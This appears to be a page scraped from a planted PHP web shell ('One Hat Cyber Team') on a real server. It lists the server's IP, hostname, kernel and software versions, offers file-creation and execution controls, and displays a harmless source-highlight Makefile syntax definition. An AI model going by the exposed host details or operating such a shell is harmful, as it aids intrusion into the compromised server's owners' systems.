One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
source-highlight
/
View File Name :
makefile.lang
# Author: Maurizio Loreti, aka MLO or (HAM) I3NOO # WWW: http://www.pd.infn.it/~loreti/mlo.html # ###################################################################### # Language definitions for Makefiles; intended for source-highlight # (see http://www.gnu.org/software/src-highlite). ###################################################################### # Modified by Lorenzo Bettini, http://www.lorenzobettini.it # Declared symbols; e.g.: # SOURCE = foo.c # ^^^^^^^^ will be highlighted as "type" (default: dark green) type = '^[a-zA-Z0-9_-]+[[:space:]]*=' # Special statements; e.g.: # .PHONY: clean # ^^^^^^^ will be highlighted as "preproc" (default: dark blue) preproc = '^\.[a-zA-Z0-9_-]+[[:space:]]*:' # automake/autoconf variables preproc = '@(.+)@' # Dependencies; e.g.: # foo.o foo.z: foo.c # ^^^^^^^^^^^^ will be highlighted as "symbol" (default: dark red) symbol = '^([[:word:].[:space:]-])+:' # Rules; e.g.: # %.o:%.c # ^^^^^^^ will be highlighted as "string" (default: red) string = '%[a-zA-Z0-9_.-]+:%[a-zA-Z0-9_.-]+' # filenames normal = '([[:word:]-]*)\.([[:word:]-]+)' # The statements following dependencies are for /bin/sh; so: include "sh.lang"